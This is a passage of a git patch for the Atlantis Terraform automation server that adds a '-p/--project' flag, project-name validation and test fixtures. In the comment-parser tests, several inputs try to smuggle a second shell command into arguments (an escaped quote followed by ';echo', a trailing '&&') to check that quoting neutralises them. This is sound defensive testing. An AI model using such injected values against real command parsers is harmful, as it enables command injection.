b/server/testfixtures/test-repos/modules/exp-output-plan-production.txt new file mode 100644 index 0000000000..caea5e6434 --- /dev/null +++ b/server/testfixtures/test-repos/modules/exp-output-plan-production.txt @@ -0,0 +1,23 @@ +Ran Plan in dir: `production` workspace: `default` +```diff +Refreshing Terraform state in-memory prior to plan... +The refreshed state will be used to calculate this plan, but will not be +persisted to local or remote state storage. + + +------------------------------------------------------------------------ + +An execution plan has been generated and is shown below. +Resource actions are indicated with the following symbols: + + create + +Terraform will perform the following actions: + ++ module.null.null_resource.this + id: +Plan: 1 to add, 0 to change, 0 to destroy. + +``` + +* To **discard** this plan click [here](lock-url). + diff --git a/server/testfixtures/test-repos/modules/exp-output-plan-staging.txt b/server/testfixtures/test-repos/modules/exp-output-plan-staging.txt new file mode 100644 index 0000000000..0e77a94421 --- /dev/null +++ b/server/testfixtures/test-repos/modules/exp-output-plan-staging.txt @@ -0,0 +1,23 @@ +Ran Plan in dir: `staging` workspace: `default` +```diff +Refreshing Terraform state in-memory prior to plan... +The refreshed state will be used to calculate this plan, but will not be +persisted to local or remote state storage. + + +------------------------------------------------------------------------ + +An execution plan has been generated and is shown below. +Resource actions are indicated with the following symbols: + + create + +Terraform will perform the following actions: + ++ module.null.null_resource.this + id: +Plan: 1 to add, 0 to change, 0 to destroy. + +``` + +* To **discard** this plan click [here](lock-url). + diff --git a/server/testfixtures/test-repos/modules/modules/null/main.tf b/server/testfixtures/test-repos/modules/modules/null/main.tf new file mode 100644 index 0000000000..14f6a189c1 --- /dev/null +++ b/server/testfixtures/test-repos/modules/modules/null/main.tf @@ -0,0 +1,10 @@ +variable "var" {} +resource "null_resource" "this" { +} +output "var" { + value = "${var.var}" +} + +output "workspace" { + value = "${terraform.workspace}" +} diff --git a/server/testfixtures/test-repos/modules/production/main.tf b/server/testfixtures/test-repos/modules/production/main.tf new file mode 100644 index 0000000000..94a103ffba --- /dev/null +++ b/server/testfixtures/test-repos/modules/production/main.tf @@ -0,0 +1,7 @@ +module "null" { + source = "../modules/null" + var = "production" +} +output "var" { + value = "${module.null.var}" +} \ No newline at end of file diff --git a/server/testfixtures/test-repos/modules/staging/main.tf b/server/testfixtures/test-repos/modules/staging/main.tf new file mode 100644 index 0000000000..15fa81303a --- /dev/null +++ b/server/testfixtures/test-repos/modules/staging/main.tf @@ -0,0 +1,7 @@ +module "null" { + source = "../modules/null" + var = "staging" +} +output "var" { + value = "${module.null.var}" +} \ No newline at end of file diff --git a/server/testfixtures/test-repos/simple/exp-output-merge-workspaces.txt b/server/testfixtures/test-repos/simple/exp-output-merge-workspaces.txt index 1b856aa5c4..5489b642a8 100644 --- a/server/testfixtures/test-repos/simple/exp-output-merge-workspaces.txt +++ b/server/testfixtures/test-repos/simple/exp-output-merge-workspaces.txt @@ -1,3 +1,3 @@ Locks and plans deleted for the projects and workspaces modified in this pull request: -- path: `runatlantis/atlantis-tests/.` workspaces: `default`, `new_workspace` +- path: `runatlantis/atlantis-tests/.` workspaces: `default`, `new_workspace` \ No newline at end of file From 6b507eb721255dfc830bd00cda60230de5592306 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Tue, 19 Jun 2018 18:59:31 +0100 Subject: [PATCH 29/69] Add -p flag. --- Makefile | 3 + server/events/comment_parser.go | 18 +++- server/events/comment_parser_test.go | 93 ++++++++++++++++++- server/events/event_parser.go | 20 ++-- server/events/event_parser_test.go | 17 ++-- server/events/markdown_renderer_test.go | 8 +- server/events/models/models.go | 1 + server/events/pull_request_operator.go | 45 ++++++++- server/events/runtime/apply_step_operator.go | 11 ++- server/events/runtime/plan_step_operater.go | 7 +- server/events/yaml/parser_validator.go | 83 ++++++++++++++--- server/events/yaml/parser_validator_test.go | 72 ++++++++++++++ server/events/yaml/raw/project.go | 3 + server/events/yaml/raw/project_test.go | 6 ++ server/events/yaml/raw/step.go | 3 + server/events/yaml/valid/valid.go | 10 ++ server/events_controller.go | 4 +- server/events_controller_e2e_test.go | 58 +++++++----- .../exp-output-apply-production.txt | 2 +- .../modules-yaml/exp-output-apply-staging.txt | 2 +- .../modules-yaml/exp-output-merge.txt | 4 +- .../modules/exp-output-apply-production.txt | 2 +- .../modules/exp-output-apply-staging.txt | 2 +- .../simple-yaml/exp-output-apply-default.txt | 2 +- .../simple-yaml/exp-output-apply-staging.txt | 2 +- ...exp-output-apply-var-default-workspace.txt | 2 +- .../exp-output-apply-var-new-workspace.txt | 2 +- .../simple/exp-output-apply-var.txt | 2 +- .../test-repos/simple/exp-output-apply.txt | 2 +- .../tfvars-yaml-no-autoplan/atlantis.yaml | 29 ++++++ .../default.backend.tfvars | 1 + .../tfvars-yaml-no-autoplan/default.tfvars | 1 + .../exp-output-apply-default.txt | 21 +++++ .../exp-output-apply-staging.txt | 21 +++++ .../exp-output-merge.txt | 3 + .../exp-output-plan-default.txt | 23 +++++ .../exp-output-plan-staging.txt | 23 +++++ .../tfvars-yaml-no-autoplan/main.tf | 19 ++++ .../staging.backend.tfvars | 1 + .../tfvars-yaml-no-autoplan/staging.tfvars | 1 + .../test-repos/tfvars-yaml/atlantis.yaml | 25 +++++ .../tfvars-yaml/default.backend.tfvars | 1 + .../test-repos/tfvars-yaml/default.tfvars | 1 + .../tfvars-yaml/exp-output-apply-default.txt | 21 +++++ .../exp-output-apply-default.txt.act | 7 ++ .../tfvars-yaml/exp-output-apply-staging.txt | 21 +++++ .../tfvars-yaml/exp-output-autoplan.txt | 51 ++++++++++ .../tfvars-yaml/exp-output-autoplan.txt.act | 61 ++++++++++++ .../tfvars-yaml/exp-output-merge.txt | 3 + .../test-repos/tfvars-yaml/main.tf | 19 ++++ .../tfvars-yaml/staging.backend.tfvars | 1 + .../test-repos/tfvars-yaml/staging.tfvars | 1 + 52 files changed, 760 insertions(+), 81 deletions(-) create mode 100644 server/testfixtures/test-repos/tfvars-yaml-no-autoplan/atlantis.yaml create mode 100644 server/testfixtures/test-repos/tfvars-yaml-no-autoplan/default.backend.tfvars create mode 100644 server/testfixtures/test-repos/tfvars-yaml-no-autoplan/default.tfvars create mode 100644 server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-apply-default.txt create mode 100644 server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-apply-staging.txt create mode 100644 server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-merge.txt create mode 100644 server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-plan-default.txt create mode 100644 server/testfixtures/test-repos/tfvars-yaml-no-autoplan/exp-output-plan-staging.txt create mode 100644 server/testfixtures/test-repos/tfvars-yaml-no-autoplan/main.tf create mode 100644 server/testfixtures/test-repos/tfvars-yaml-no-autoplan/staging.backend.tfvars create mode 100644 server/testfixtures/test-repos/tfvars-yaml-no-autoplan/staging.tfvars create mode 100644 server/testfixtures/test-repos/tfvars-yaml/atlantis.yaml create mode 100644 server/testfixtures/test-repos/tfvars-yaml/default.backend.tfvars create mode 100644 server/testfixtures/test-repos/tfvars-yaml/default.tfvars create mode 100644 server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt create mode 100644 server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-default.txt.act create mode 100644 server/testfixtures/test-repos/tfvars-yaml/exp-output-apply-staging.txt create mode 100644 server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt create mode 100644 server/testfixtures/test-repos/tfvars-yaml/exp-output-autoplan.txt.act create mode 100644 server/testfixtures/test-repos/tfvars-yaml/exp-output-merge.txt create mode 100644 server/testfixtures/test-repos/tfvars-yaml/main.tf create mode 100644 server/testfixtures/test-repos/tfvars-yaml/staging.backend.tfvars create mode 100644 server/testfixtures/test-repos/tfvars-yaml/staging.tfvars diff --git a/Makefile b/Makefile index 442d4b90ee..5f10ddf0eb 100644 --- a/Makefile +++ b/Makefile @@ -35,6 +35,9 @@ regen-mocks: ## Delete all mocks and then run go generate to regen them go generate $$(go list ./... | grep -v e2e | grep -v vendor | grep -v static) test: ## Run tests + @go test -short $(PKG) + +test-all: ## Run tests including integration @go test $(PKG) test-coverage: diff --git a/server/events/comment_parser.go b/server/events/comment_parser.go index 69e845197a..808d4493a9 100644 --- a/server/events/comment_parser.go +++ b/server/events/comment_parser.go @@ -21,6 +21,7 @@ import ( "strings" "github.com/runatlantis/atlantis/server/events/models" + "github.com/runatlantis/atlantis/server/events/yaml" "github.com/spf13/pflag" ) @@ -29,6 +30,8 @@ const ( WorkspaceFlagShort = "w" DirFlagLong = "dir" DirFlagShort = "d" + ProjectFlagLong = "project" + ProjectFlagShort = "p" VerboseFlagLong = "verbose" VerboseFlagShort = "" DefaultWorkspace = "default" @@ -131,6 +134,7 @@ func (e *CommentParser) Parse(comment string, vcsHost models.VCSHostType) Commen var workspace string var dir string + var project string var verbose bool var extraArgs []string var flagSet *pflag.FlagSet @@ -144,6 +148,7 @@ func (e *CommentParser) Parse(comment string, vcsHost models.VCSHostType) Commen flagSet.SetOutput(ioutil.Discard) flagSet.StringVarP(&workspace, WorkspaceFlagLong, WorkspaceFlagShort, DefaultWorkspace, "Switch to this Terraform workspace before planning.") flagSet.StringVarP(&dir, DirFlagLong, DirFlagShort, DefaultDir, "Which directory to run plan in relative to root of repo, ex. 'child/dir'.") + flagSet.StringVarP(&project, ProjectFlagLong, ProjectFlagShort, "", fmt.Sprintf("Which project to run plan for. Refers to the name of the project configured in %s. Cannot be used at same time as workspace or dir flags.", yaml.AtlantisYAMLFilename)) flagSet.BoolVarP(&verbose, VerboseFlagLong, VerboseFlagShort, false, "Append Atlantis log to comment.") case Apply.String(): name = Apply @@ -151,6 +156,7 @@ func (e *CommentParser) Parse(comment string, vcsHost models.VCSHostType) Commen flagSet.SetOutput(ioutil.Discard) flagSet.StringVarP(&workspace, WorkspaceFlagLong, WorkspaceFlagShort, DefaultWorkspace, "Apply the plan for this Terraform workspace.") flagSet.StringVarP(&dir, DirFlagLong, DirFlagShort, DefaultDir, "Apply the plan for this directory, relative to root of repo, ex. 'child/dir'.") + flagSet.StringVarP(&project, ProjectFlagLong, ProjectFlagShort, "", fmt.Sprintf("Apply the plan for this project. Refers to the name of the project configured in %s. Cannot be used at same time as workspace or dir flags.", yaml.AtlantisYAMLFilename)) flagSet.BoolVarP(&verbose, VerboseFlagLong, VerboseFlagShort, false, "Append Atlantis log to comment.") default: return CommentParseResult{CommentResponse: fmt.Sprintf("Error: unknown command %q – this is a bug", command)} @@ -198,8 +204,18 @@ func (e *CommentParser) Parse(comment string, vcsHost models.VCSHostType) Commen return CommentParseResult{CommentResponse: e.errMarkdown(fmt.Sprintf("invalid workspace: %q", workspace), command, flagSet)} } + // If project is specified, dir or workspace should not be set. Since we + // dir/workspace have defaults we can't detect if the user set the flag + // to the default or didn't set the flag so there is an edge case here we + // don't detect, ex. atlantis plan -p project -d . -w default won't cause + // an error. + if project != "" && (workspace != DefaultWorkspace || dir != DefaultDir) { + err := fmt.Sprintf("cannot use -%s/--%s at same time as -%s/--%s or -%s/--%s", ProjectFlagShort, ProjectFlagLong, DirFlagShort, DirFlagLong, WorkspaceFlagShort, WorkspaceFlagLong) + return CommentParseResult{CommentResponse: e.errMarkdown(err, command, flagSet)} + } + return CommentParseResult{ - Command: NewCommand(dir, extraArgs, name, verbose, workspace, false), + Command: NewCommand(dir, extraArgs, name, verbose, workspace, project, false), } } diff --git a/server/events/comment_parser_test.go b/server/events/comment_parser_test.go index 81fe4da9f8..db44003724 100644 --- a/server/events/comment_parser_test.go +++ b/server/events/comment_parser_test.go @@ -255,6 +255,22 @@ func TestParse_InvalidWorkspace(t *testing.T) { } } +func TestParse_UsingProjectAtSameTimeAsWorkspaceOrDir(t *testing.T) { + cases := []string{ + "atlantis plan -w workspace -p project", + "atlantis plan -d dir -p project", + "atlantis plan -d dir -w workspace -p project", + } + for _, c := range cases { + t.Run(c, func(t *testing.T) { + r := commentParser.Parse(c, models.Github) + exp := "Error: cannot use -p/--project at same time as -d/--dir or -w/--workspace" + Assert(t, strings.Contains(r.CommentResponse, exp), + "For comment %q expected CommentResponse %q to contain %q", c, r.CommentResponse, exp) + }) + } +} + func TestParse_Parsing(t *testing.T) { cases := []struct { flags string @@ -262,6 +278,7 @@ func TestParse_Parsing(t *testing.T) { expDir string expVerbose bool expExtraArgs string + expProject string }{ // Test defaults. { @@ -270,14 +287,16 @@ func TestParse_Parsing(t *testing.T) { ".", false, "", + "", }, - // Test each flag individually. + // Test each short flag individually. { "-w workspace", "workspace", ".", false, "", + "", }, { "-d dir", @@ -285,6 +304,15 @@ func TestParse_Parsing(t *testing.T) { "dir", false, "", + "", + }, + { + "-p project", + "default", + ".", + false, + "", + "project", }, { "--verbose", @@ -292,6 +320,32 @@ func TestParse_Parsing(t *testing.T) { ".", true, "", + "", + }, + // Test each long flag individually. + { + "--workspace workspace", + "workspace", + ".", + false, + "", + "", + }, + { + "--dir dir", + "default", + "dir", + false, + "", + "", + }, + { + "--project project", + "default", + ".", + false, + "", + "project", }, // Test all of them with different permutations. { @@ -300,6 +354,7 @@ func TestParse_Parsing(t *testing.T) { "dir", true, "", + "", }, { "-d dir -w workspace --verbose", @@ -307,6 +362,7 @@ func TestParse_Parsing(t *testing.T) { "dir", true, "", + "", }, { "--verbose -w workspace -d dir", @@ -314,6 +370,23 @@ func TestParse_Parsing(t *testing.T) { "dir", true, "", + "", + }, + { + "-p project --verbose", + "default", + ".", + true, + "", + "project", + }, + { + "--verbose -p project", + "default", + ".", + true, + "", + "project", }, // Test that flags after -- are ignored { @@ -322,6 +395,7 @@ func TestParse_Parsing(t *testing.T) { "dir", false, "\"--verbose\"", + "", }, { "-w workspace -- -d dir --verbose", @@ -329,6 +403,7 @@ func TestParse_Parsing(t *testing.T) { ".", false, "\"-d\" \"dir\" \"--verbose\"", + "", }, // Test the extra args parsing. { @@ -337,6 +412,7 @@ func TestParse_Parsing(t *testing.T) { ".", false, "", + "", }, // Test trying to escape quoting { @@ -345,6 +421,7 @@ func TestParse_Parsing(t *testing.T) { ".", false, `"\";echo" "\"hi"`, + "", }, { "-w workspace -d dir --verbose -- arg one -two --three &&", @@ -352,6 +429,7 @@ func TestParse_Parsing(t *testing.T) { "dir", true, "\"arg\" \"one\" \"-two\" \"--three\" \"&&\"", + "", }, // Test whitespace. { @@ -360,6 +438,7 @@ func TestParse_Parsing(t *testing.T) { "dir", true, "\"arg\" \"one\" \"-two\" \"--three\" \"&&\"", + "", }, { " -w workspace -d dir --verbose -- arg one -two --three &&", @@ -367,6 +446,7 @@ func TestParse_Parsing(t *testing.T) { "dir", true, "\"arg\" \"one\" \"-two\" \"--three\" \"&&\"", + "", }, // Test that the dir string is normalized. { @@ -375,6 +455,7 @@ func TestParse_Parsing(t *testing.T) { ".", false, "", + "", }, { "-d /adir", @@ -382,6 +463,7 @@ func TestParse_Parsing(t *testing.T) { "adir", false, "", + "", }, { "-d .", @@ -389,6 +471,7 @@ func TestParse_Parsing(t *testing.T) { ".", false, "", + "", }, { "-d ./", @@ -396,6 +479,7 @@ func TestParse_Parsing(t *testing.T) { ".", false, "", + "", }, { "-d ./adir", @@ -403,6 +487,7 @@ func TestParse_Parsing(t *testing.T) { "adir", false, "", + "", }, } for _, test := range cases { @@ -428,6 +513,9 @@ func TestParse_Parsing(t *testing.T) { var PlanUsage = `Usage of plan: -d, --dir string Which directory to run plan in relative to root of repo, ex. 'child/dir'. (default ".") + -p, --project string Which project to run plan for. Refers to the name of the + project configured in atlantis.yaml. Cannot be used at + same time as workspace or dir flags. --verbose Append Atlantis log to comment. -w, --workspace string Switch to this Terraform workspace before planning. (default "default") @@ -436,6 +524,9 @@ var PlanUsage = `Usage of plan: var ApplyUsage = `Usage of apply: -d, --dir string Apply the plan for this directory, relative to root of repo, ex. 'child/dir'. (default ".") + -p, --project string Apply the plan for this project. Refers to the name of + the project configured in atlantis.yaml. Cannot be used + at same time as workspace or dir flags. --verbose Append Atlantis log to comment. -w, --workspace string Apply the plan for this Terraform workspace. (default "default") diff --git a/server/events/event_parser.go b/server/events/event_parser.go index 448dcee867..dbdccc8e50 100644 --- a/server/events/event_parser.go +++ b/server/events/event_parser.go @@ -47,14 +47,17 @@ type Command struct { // Autoplan is true if the command is a plan command being executed in an // attempt to automatically run plan. Autoplan bool + // ProjectName is the name of a project to run the command on. It refers to a + // project specified in an atlantis.yaml file. + ProjectName string } func (c Command) String() string { - return fmt.Sprintf("command=%q verbose=%t dir=%q workspace=%q autoplan=%t flags=%q", c.Name.String(), c.Verbose, c.Dir, c.Workspace, c.Autoplan, strings.Join(c.Flags, ",")) + return fmt.Sprintf("command=%q verbose=%t dir=%q workspace=%q project=%q autoplan=%t flags=%q", c.Name.String(), c.Verbose, c.Dir, c.Workspace, c.ProjectName, c.Autoplan, strings.Join(c.Flags, ",")) } // NewCommand constructs a Command, setting all missing fields to defaults. -func NewCommand(dir string, flags []string, name CommandName, verbose bool, workspace string, autoplan bool) *Command { +func NewCommand(dir string, flags []string, name CommandName, verbose bool, workspace string, project string, autoplan bool) *Command { // If dir was an empty string, this will return '.'. validDir := path.Clean(dir) if validDir == "/" { @@ -64,12 +67,13 @@ func NewCommand(dir string, flags []string, name CommandName, verbose bool, work workspace = DefaultWorkspace } return &Command{ - Dir: validDir, - Flags: flags, - Name: name, - Verbose: verbose, - Workspace: workspace, - Autoplan: autoplan, + Dir: validDir, + Flags: flags, + Name: name, + Verbose: verbose, + Workspace: workspace, + Autoplan: autoplan, + ProjectName: project, } } diff --git a/server/events/event_parser_test.go b/server/events/event_parser_test.go index 2e9b7e4346..1415ffba3f 100644 --- a/server/events/event_parser_test.go +++ b/server/events/event_parser_test.go @@ -283,25 +283,26 @@ func TestNewCommand_CleansDir(t *testing.T) { for _, c := range cases { t.Run(c.Dir, func(t *testing.T) { - cmd := events.NewCommand(c.Dir, nil, events.Plan, false, "workspace", false) + cmd := events.NewCommand(c.Dir, nil, events.Plan, false, "workspace", "", false) Equals(t, c.ExpDir, cmd.Dir) }) } } func TestNewCommand_EmptyWorkspace(t *testing.T) { - cmd := events.NewCommand("dir", nil, events.Plan, false, "", false) + cmd := events.NewCommand("dir", nil, events.Plan, false, "", "", false) Equals(t, "default", cmd.Workspace) } func TestNewCommand_AllFieldsSet(t *testing.T) { - cmd := events.NewCommand("dir", []string{"a", "b"}, events.Plan, true, "workspace", false) + cmd := events.NewCommand("dir", []string{"a", "b"}, events.Plan, true, "workspace", "project", false) Equals(t, events.Command{ - Workspace: "workspace", - Dir: "dir", - Verbose: true, - Flags: []string{"a", "b"}, - Name: events.Plan, + Workspace: "workspace", + Dir: "dir", + Verbose: true, + Flags: []string{"a", "b"}, + Name: events.Plan, + ProjectName: "project", }, *cmd) } diff --git a/server/events/markdown_renderer_test.go b/server/events/markdown_renderer_test.go index 414d300810..202097e9be 100644 --- a/server/events/markdown_renderer_test.go +++ b/server/events/markdown_renderer_test.go @@ -50,7 +50,7 @@ func TestRenderErr(t *testing.T) { } for _, verbose := range []bool{true, false} { t.Log("testing " + c.Description) - s := r.Render(res, c.Command, "log", verbose) + s := r.Render(res, c.Command, "log", verbose, false) if !verbose { Equals(t, c.Expected, s) } else { @@ -88,7 +88,7 @@ func TestRenderFailure(t *testing.T) { } for _, verbose := range []bool{true, false} { t.Log("testing " + c.Description) - s := r.Render(res, c.Command, "log", verbose) + s := r.Render(res, c.Command, "log", verbose, false) if !verbose { Equals(t, c.Expected, s) } else { @@ -105,7 +105,7 @@ func TestRenderErrAndFailure(t *testing.T) { Error: errors.New("error"), Failure: "failure", } - s := r.Render(res, events.Plan, "", false) + s := r.Render(res, events.Plan, "", false, false) Equals(t, "**Plan Error**\n```\nerror\n```\n\n", s) } @@ -263,7 +263,7 @@ func TestRenderProjectResults(t *testing.T) { } for _, verbose := range []bool{true, false} { t.Run(c.Description, func(t *testing.T) { - s := r.Render(res, c.Command, "log", verbose) + s := r.Render(res, c.Command, "log", verbose, false) if !verbose { Equals(t, c.Expected, s) } else { diff --git a/server/events/models/models.go b/server/events/models/models.go index d4ba85fee0..a71251e7b0 100644 --- a/server/events/models/models.go +++ b/server/events/models/models.go @@ -237,4 +237,5 @@ type ProjectCommandContext struct { // ex. atlantis plan -- -target=resource CommentArgs []string Workspace string + ProjectName string } diff --git a/server/events/pull_request_operator.go b/server/events/pull_request_operator.go index 6012214f52..fabad33d0f 100644 --- a/server/events/pull_request_operator.go +++ b/server/events/pull_request_operator.go @@ -1,6 +1,7 @@ package events import ( + "fmt" "os" "path/filepath" @@ -80,6 +81,7 @@ func (p *DefaultPullRequestOperator) Autoplan(ctx *CommandContext) CommandRespon User: ctx.User, Log: ctx.Log, RepoRelPath: mp.Path, + ProjectName: "", ProjectConfig: nil, GlobalConfig: nil, CommentArgs: nil, @@ -99,6 +101,10 @@ func (p *DefaultPullRequestOperator) Autoplan(ctx *CommandContext) CommandRespon // project config. for i := 0; i < len(matchingProjects); i++ { mp := matchingProjects[i] + var projectName string + if mp.Name != nil { + projectName = *mp.Name + } projCtxs = append(projCtxs, models.ProjectCommandContext{ BaseRepo: ctx.BaseRepo, HeadRepo: ctx.HeadRepo, @@ -108,6 +114,7 @@ func (p *DefaultPullRequestOperator) Autoplan(ctx *CommandContext) CommandRespon CommentArgs: nil, Workspace: mp.Workspace, RepoRelPath: mp.Dir, + ProjectName: projectName, ProjectConfig: &mp, GlobalConfig: &config, }) @@ -139,11 +146,25 @@ func (p *DefaultPullRequestOperator) PlanViaComment(ctx *CommandContext) Command if err != nil && !os.IsNotExist(err) { return CommandResponse{Error: err} } - if !os.IsNotExist(err) { - projCfg = config.FindProject(ctx.Command.Dir, ctx.Command.Workspace) + hasAtlantisYAML := !os.IsNotExist(err) + if hasAtlantisYAML { + // If they've specified a project by name we look it up. Otherwise we + // use the dir and workspace. + if ctx.Command.ProjectName != "" { + projCfg = config.FindProjectByName(ctx.Command.ProjectName) + if projCfg == nil { + return CommandResponse{Error: fmt.Errorf("no project with name %q configured", ctx.Command.ProjectName)} + } + } else { + projCfg = config.FindProject(ctx.Command.Dir, ctx.Command.Workspace) + } globalCfg = &config } + if ctx.Command.ProjectName != "" && !hasAtlantisYAML { + return CommandResponse{Error: fmt.Errorf("cannot specify a project name unless an %s file exists to configure projects", yaml.AtlantisYAMLFilename)} + } + projCtx := models.ProjectCommandContext{ BaseRepo: ctx.BaseRepo, HeadRepo: ctx.HeadRepo, @@ -153,6 +174,7 @@ func (p *DefaultPullRequestOperator) PlanViaComment(ctx *CommandContext) Command CommentArgs: ctx.Command.Flags, Workspace: ctx.Command.Workspace, RepoRelPath: ctx.Command.Dir, + ProjectName: ctx.Command.ProjectName, ProjectConfig: projCfg, GlobalConfig: globalCfg, } @@ -182,11 +204,25 @@ func (p *DefaultPullRequestOperator) ApplyViaComment(ctx *CommandContext) Comman if err != nil && !os.IsNotExist(err) { return CommandResponse{Error: err} } - if !os.IsNotExist(err) { - projCfg = config.FindProject(ctx.Command.Dir, ctx.Command.Workspace) + hasAtlantisYAML := !os.IsNotExist(err) + if hasAtlantisYAML { + // If they've specified a project by name we look it up. Otherwise we + // use the dir and workspace. + if ctx.Command.ProjectName != "" { + projCfg = config.FindProjectByName(ctx.Command.ProjectName) + if projCfg == nil { + return CommandResponse{Error: fmt.Errorf("no project with name %q configured", ctx.Command.ProjectName)} + } + } else { + projCfg = config.FindProject(ctx.Command.Dir, ctx.Command.Workspace) + } globalCfg = &config } + if ctx.Command.ProjectName != "" && !hasAtlantisYAML { + return CommandResponse{Error: fmt.Errorf("cannot specify a project name unless an %s file exists to configure projects", yaml.AtlantisYAMLFilename)} + } + projCtx := models.ProjectCommandContext{ BaseRepo: ctx.BaseRepo, HeadRepo: ctx.HeadRepo, @@ -196,6 +232,7 @@ func (p *DefaultPullRequestOperator) ApplyViaComment(ctx *CommandContext) Comman CommentArgs: ctx.Command.Flags, Workspace: ctx.Command.Workspace, RepoRelPath: ctx.Command.Dir, + ProjectName: ctx.Command.ProjectName, ProjectConfig: projCfg, GlobalConfig: globalCfg, } diff --git a/server/events/runtime/apply_step_operator.go b/server/events/runtime/apply_step_operator.go index 819bcbf200..7b4a58c80a 100644 --- a/server/events/runtime/apply_step_operator.go +++ b/server/events/runtime/apply_step_operator.go @@ -15,13 +15,18 @@ type ApplyStepOperator struct { } func (a *ApplyStepOperator) Run(ctx models.ProjectCommandContext, extraArgs []string, path string) (string, error) { - planPath := filepath.Join(path, ctx.Workspace+".tfplan") - stat, err := os.Stat(planPath) + // todo: move this to a common library + planFileName := fmt.Sprintf("%s.tfplan", ctx.Workspace) + if ctx.ProjectName != "" { + planFileName = fmt.Sprintf("%s-%s", ctx.ProjectName, planFileName) + } + planFile := filepath.Join(path, planFileName) + stat, err := os.Stat(planFile) if err != nil || stat.IsDir() { return "", fmt.Errorf("no plan found at path %q and workspace %q–did you run plan?", ctx.RepoRelPath, ctx.Workspace) } - tfApplyCmd := append(append(append([]string{"apply", "-no-color"}, extraArgs...), ctx.CommentArgs...), planPath) + tfApplyCmd := append(append(append([]string{"apply", "-no-color"}, extraArgs...), ctx.CommentArgs...), planFile) var tfVersion *version.Version if ctx.ProjectConfig != nil && ctx.ProjectConfig.TerraformVersion != nil { tfVersion = ctx.ProjectConfig.TerraformVersion diff --git a/server/events/runtime/plan_step_operater.go b/server/events/runtime/plan_step_operater.go index a7fd6793d0..30028dd487 100644 --- a/server/events/runtime/plan_step_operater.go +++ b/server/events/runtime/plan_step_operater.go @@ -32,7 +32,12 @@ func (p *PlanStepOperator) Run(ctx models.ProjectCommandContext, extraArgs []str return "", err } - planFile := filepath.Join(path, fmt.Sprintf("%s.tfplan", ctx.Workspace)) + // todo: move this to a common library + planFileName := fmt.Sprintf("%s.tfplan", ctx.Workspace) + if ctx.ProjectName != "" { + planFileName = fmt.Sprintf("%s-%s", ctx.ProjectName, planFileName) + } + planFile := filepath.Join(path, planFileName) userVar := fmt.Sprintf("%s=%s", atlantisUserTFVar, ctx.User.Username) tfPlanCmd := append(append([]string{"plan", "-refresh", "-no-color", "-out", planFile, "-var", userVar}, extraArgs...), ctx.CommentArgs...) diff --git a/server/events/yaml/parser_validator.go b/server/events/yaml/parser_validator.go index 8dc895d132..a56ca586c6 100644 --- a/server/events/yaml/parser_validator.go +++ b/server/events/yaml/parser_validator.go @@ -21,7 +21,7 @@ type ParserValidator struct{} // ReadConfig returns the parsed and validated atlantis.yaml config for repoDir. // If there was no config file, then this can be detected by checking the type // of error: os.IsNotExist(error). -func (r *ParserValidator) ReadConfig(repoDir string) (valid.Spec, error) { +func (p *ParserValidator) ReadConfig(repoDir string) (valid.Spec, error) { configFile := filepath.Join(repoDir, AtlantisYAMLFilename) configData, err := ioutil.ReadFile(configFile) @@ -37,14 +37,14 @@ func (r *ParserValidator) ReadConfig(repoDir string) (valid.Spec, error) { } // If the config file exists, parse it. - config, err := r.parseAndValidate(configData) + config, err := p.parseAndValidate(configData) if err != nil { return valid.Spec{}, errors.Wrapf(err, "parsing %s", AtlantisYAMLFilename) } return config, err } -func (r *ParserValidator) parseAndValidate(configData []byte) (valid.Spec, error) { +func (p *ParserValidator) parseAndValidate(configData []byte) (valid.Spec, error) { var rawSpec raw.Spec if err := yaml.UnmarshalStrict(configData, &rawSpec); err != nil { return valid.Spec{}, err @@ -58,20 +58,73 @@ func (r *ParserValidator) parseAndValidate(configData []byte) (valid.Spec, error } // Top level validation. - for _, p := range rawSpec.Projects { - if p.Workflow != nil { - workflow := *p.Workflow - found := false - for k := range rawSpec.Workflows { - if k == workflow { - found = true - } - } - if !found { - return valid.Spec{}, fmt.Errorf("workflow %q is not defined", workflow) + if err := p.validateWorkflows(rawSpec); err != nil { + return valid.Spec{}, err + } + + validSpec := rawSpec.ToValid() + if err := p.validateProjectNames(validSpec); err != nil { + return valid.Spec{}, err + } + + return validSpec, nil +} + +func (p *ParserValidator) validateProjectNames(spec valid.Spec) error { + // First, validate that all names are unique. + seen := make(map[string]bool) + for _, project := range spec.Projects { + if project.Name != nil { + name := *project.Name + exists := seen[name] + if exists { + return fmt.Errorf("found two or more projects with name %q; project names must be unique", name) } + seen[name] = true } } - return rawSpec.ToValid(), nil + // Next, validate that all dir/workspace combos are named. + // This map's keys will be 'dir/workspace' and the values are the names for + // that project. + dirWorkspaceToNames := make(map[string][]string) + for _, project := range spec.Projects { + key := fmt.Sprintf("%s/%s", project.Dir, project.Workspace) + names := dirWorkspaceToNames[key] + + // If there is already a project with this dir/workspace then this + // project must have a name. + if len(names) > 0 && project.Name == nil { + return fmt.Errorf("there are two or more projects with dir: %q workspace: %q that are not all named; they must have a 'name' key so they can be targeted for apply's separately", project.Dir, project.Workspace) + } + var name string + if project.Name != nil { + name = *project.Name + } + dirWorkspaceToNames[key] = append(dirWorkspaceToNames[key], name) + } + + return nil +} + +func (p *ParserValidator) validateWorkflows(spec raw.Spec) error { + for _, project := range spec.Projects { + if err := p.validateWorkflowExists(project, spec.Workflows); err != nil { + return err + } + } + return nil +} + +func (p *ParserValidator) validateWorkflowExists(project raw.Project, workflows map[string]raw.Workflow) error { + if project.Workflow == nil { + return nil + } + workflow := *project.Workflow + for k := range workflows { + if k == workflow { + return nil + } + } + return fmt.Errorf("workflow %q is not defined", workflow) } diff --git a/server/events/yaml/parser_validator_test.go b/server/events/yaml/parser_validator_test.go index 15bcd19602..abafcba940 100644 --- a/server/events/yaml/parser_validator_test.go +++ b/server/events/yaml/parser_validator_test.go @@ -262,6 +262,78 @@ projects: workflow: undefined`, expErr: "workflow \"undefined\" is not defined", }, + { + description: "two projects with same dir/workspace without names", + input: ` +version: 2 +projects: +- dir: . + workspace: workspace +- dir: . + workspace: workspace`, + expErr: "there are two or more projects with dir: \".\" workspace: \"workspace\" that are not all named; they must have a 'name' key so they can be targeted for apply's 